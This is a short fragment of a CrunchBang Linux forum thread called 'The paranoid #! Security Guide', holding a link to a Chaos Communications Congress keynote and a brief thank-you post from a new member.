Did you see his keynote at the 29th Chaos Communications Congress? http://www.youtube.com/watch?v=Wl5OQz0Ko8c

Offline

Help fund CrunchBang, donate to the project!

#100 2013-05-26 06:25:24

locknlol
New Member
Registered: 2012-03-01
Posts: 4

Re: The paranoid #! Security Guide

Awesome thread, thanks for the great insight to linux security. (Yay first post!)

Last edited by locknlol (2013-05-26 06:25:37)

Offline

Board footer

Powered by FluxBB

Copyright © 2012 CrunchBang Linux.
Proudly powered by Debian. Hosted by Linode.
Debian is a registered trademark of Software in the Public Interest, Inc.

Debian Logo